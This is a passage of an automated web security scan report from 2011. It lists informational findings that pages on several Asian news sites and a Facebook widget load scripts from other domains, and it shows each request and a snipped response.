Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24865


<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="Keywords" content="asia, news, network, Southeast Asia, Business, Viewpoint, Hot
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<!--BEGIN WEB STAT CODE-->
<SCRIPT LANGUAGE="javascript1.1" src="http://hits.truehits.in.th/data/s0028969.js"></SCRIPT>
...[SNIP]...

22.62. http://www.asianewsnet.net/home/video.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asianewsnet.net
Path:   /home/video.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/video.php HTTP/1.1
Host: www.asianewsnet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18889


<html>
<head>
<title>ASIA NEWS NETWORK</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="Keywords" content="asia, news, network, Southeast Asia, Busines
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<!--BEGIN WEB STAT CODE-->
<SCRIPT LANGUAGE="javascript1.1" src="http://hits.truehits.in.th/data/s0028969.js"></SCRIPT>
...[SNIP]...

22.63. http://www.bangkokpost.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:24:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: paramsR24=deleted; expires=Sat, 04-Sep-2010 02:24:53 GMT; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 94108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head></head>
<title>Bangkok
...[SNIP]...
</script>
       <script type="text/javascript" src="http://hits.truehits.in.th/data/s0028944.js"></script>
...[SNIP]...

22.64. http://www.bangkokpost.com/ads/google_adsense_728x90.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /ads/google_adsense_728x90.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ads/google_adsense_728x90.html HTTP/1.1
Host: www.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/telecom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; PHPSESSID=s4m8rs24o8o6s2ql7dbjgud8m7; _cbclose62518=1; _uid62518=2BAEE501.1; verify=test; _cbclose=1; _ctout62518=1; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.3.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:45:30 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 24 Jan 2011 05:13:03 GMT
ETag: "2ba0ef1-2d4-a78015c0"
Accept-Ranges: bytes
Content-Length: 724
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

22.65. http://www.bangkokpost.com/blogs/index.php/2011/08/30/small-parties-can-always-win-at-a-stretc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /blogs/index.php/2011/08/30/small-parties-can-always-win-at-a-stretc

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/index.php/2011/08/30/small-parties-can-always-win-at-a-stretc HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:26:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-TH" lang="th-TH">
<h
...[SNIP]...
</SCRIPT>
<SCRIPT LANGUAGE="javascript1.1" src="http://hits.truehits.in.th/data/s0028944.js"></SCRIPT>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

22.66. http://www.bangkokpost.com/blogs/index.php/2011/08/31/transparency-call-for-new-women-s-fund  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /blogs/index.php/2011/08/31/transparency-call-for-new-women-s-fund

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/index.php/2011/08/31/transparency-call-for-new-women-s-fund HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:26:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-TH" lang="th-TH">
<h
...[SNIP]...
</SCRIPT>
<SCRIPT LANGUAGE="javascript1.1" src="http://hits.truehits.in.th/data/s0028944.js"></SCRIPT>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

22.67. http://www.bangkokpost.com/blogs/index.php/2011/09/02/in-venice-madonna-and-her-movie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /blogs/index.php/2011/09/02/in-venice-madonna-and-her-movie

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/index.php/2011/09/02/in-venice-madonna-and-her-movie HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:26:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-TH" lang="th-TH">
<h
...[SNIP]...
</SCRIPT>
<SCRIPT LANGUAGE="javascript1.1" src="http://hits.truehits.in.th/data/s0028944.js"></SCRIPT>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

22.68. http://www.bangkokpost.com/blogs/index.php/2011/09/03/in-venice-jung-freud-and-the-glory-of-pr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /blogs/index.php/2011/09/03/in-venice-jung-freud-and-the-glory-of-pr

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/index.php/2011/09/03/in-venice-jung-freud-and-the-glory-of-pr HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:25:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-TH" lang="th-TH">
<h
...[SNIP]...
</SCRIPT>
<SCRIPT LANGUAGE="javascript1.1" src="http://hits.truehits.in.th/data/s0028944.js"></SCRIPT>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

22.69. http://www.bangkokpost.com/business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/ HTTP/1.1
Host: www.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; PHPSESSID=s4m8rs24o8o6s2ql7dbjgud8m7; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.1.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _cbclose62518=1; _uid62518=2BAEE501.1; _ctout62518=1; verify=test

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:46:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 53299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkok Post :
...[SNIP]...
</script>
       <script type="text/javascript" src="http://hits.truehits.in.th/data/s0028944.js"></script>
...[SNIP]...

22.70. http://www.bangkokpost.com/business/telecom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/telecom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/telecom HTTP/1.1
Host: www.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: verify=test; __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; PHPSESSID=s4m8rs24o8o6s2ql7dbjgud8m7; _cbclose62518=1; _uid62518=2BAEE501.1; verify=test; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.2.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout62518=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 30345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkok Post :
...[SNIP]...
</script>
       <script type="text/javascript" src="http://hits.truehits.in.th/data/s0028944.js"></script>
...[SNIP]...

22.71. http://www.bangkokpost.com/classified/viewforum.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /classified/viewforum.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /classified/viewforum.php HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:25:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: phpbb3_classified_u=1; expires=Mon, 03-Sep-2012 04:25:36 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_classified_k=; expires=Mon, 03-Sep-2012 04:25:36 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_classified_sid=0022f913f5b11b1d9c1e205c086f2d6d; expires=Mon, 03-Sep-2012 04:25:36 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...
</SCRIPT>
<SCRIPT LANGUAGE="javascript1.1" src="http://hits.truehits.in.th/data/s0028944.js"></SCRIPT>
...[SNIP]...

22.72. http://www.bangkokpost.com/forum/search.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /forum/search.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forum/search.php HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:24:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: phpbb3_forum_u=1; expires=Mon, 03-Sep-2012 04:24:32 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_forum_k=; expires=Mon, 03-Sep-2012 04:24:32 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_forum_sid=4b7e42997a4826550f71c3f558e7505f; expires=Mon, 03-Sep-2012 04:24:32 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...
</SCRIPT>
<SCRIPT LANGUAGE="javascript1.1" src="http://hits.truehits.in.th/data/s0028944.js"></SCRIPT>
...[SNIP]...

22.73. http://www.bangkokpost.com/forum/viewforum.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /forum/viewforum.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forum/viewforum.php HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:24:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...
</SCRIPT>
<SCRIPT LANGUAGE="javascript1.1" src="http://hits.truehits.in.th/data/s0028944.js"></SCRIPT>
...[SNIP]...

22.74. http://www.bangkokpost.com/forum/viewtopic.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /forum/viewtopic.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forum/viewtopic.php HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:24:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...
</SCRIPT>
<SCRIPT LANGUAGE="javascript1.1" src="http://hits.truehits.in.th/data/s0028944.js"></SCRIPT>
...[SNIP]...

22.75. http://www.bangkokpost.com/search/news-and-article  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /search/news-and-article

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search/news-and-article HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:24:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Thailand's Sear
...[SNIP]...
</script>
       <script type="text/javascript" src="http://hits.truehits.in.th/data/s0028944.js"></script>
...[SNIP]...

22.76. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /widgets/fan.php HTTP/1.1
Host: www.connect.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.235.108
Connection: close
Date: Sun, 04 Sep 2011 04:27:43 GMT
Content-Length: 4251

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/GjAkfCLY2D7.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
...[SNIP]...

22.77. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /widgets/fan.php?api_key=731d4310e657b3903e3002a6432bca32&channel_url=http%3A%2F%2Ftimesofindia.indiatimes.com%2Ftoifanapp.cms%3Ffbc_channel%3D1&id=26781952138&name=&width=300&connections=&stream=0&logobar=1&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/toifanapp.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.176.106
X-Cnection: close
Date: Sun, 04 Sep 2011 02:25:48 GMT
Content-Length: 8406

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
...[SNIP]...

22.78. http://www.dnaindia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dnaindia.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news#sclient=psy&hl=en&source=hp&q=mumbay+news&pbx=1&oq=mumbay+news&aq=f&aqi=g-c5&aql=&gs_sm=e&gs_upl=32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 02:31:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 113803
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mumbai - In
...[SNIP]...
<!-- GAM -->
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d8.zedo.com/jsc/d8/fo.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
<!-- footer ends -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</div> <script type='text/javascript' src='http://static.eplayer.performgroup.com/flash/js/swfobject.js'></script><script type='text/javascript' src='http://static.eplayer.performgroup.com/flash/js/performgroup.js'></script>
...[SNIP]...

22.79. http://www.dnaindia.com/redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dnaindia.com
Path:   /redirect

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /redirect HTTP/1.1
Host: www.dnaindia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 04:28:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 502
Connection: Close

<html>

<head>
<title>DNA - Daily News & Analysis</title>
<META NAME="Googlebot" CONTENT="nofollow">
<META HTTP-EQUIV="refresh" CONTENT="3;url=">
</head>

<body>

<a href="">If you are not a
...[SNIP]...
</h4>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

22.80. http://www.dnaindia.com/sport/report_rain-plays-spoilsport-first-odi-abandoned_1582791  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dnaindia.com
Path:   /sport/report_rain-plays-spoilsport-first-odi-abandoned_1582791

Issue detail

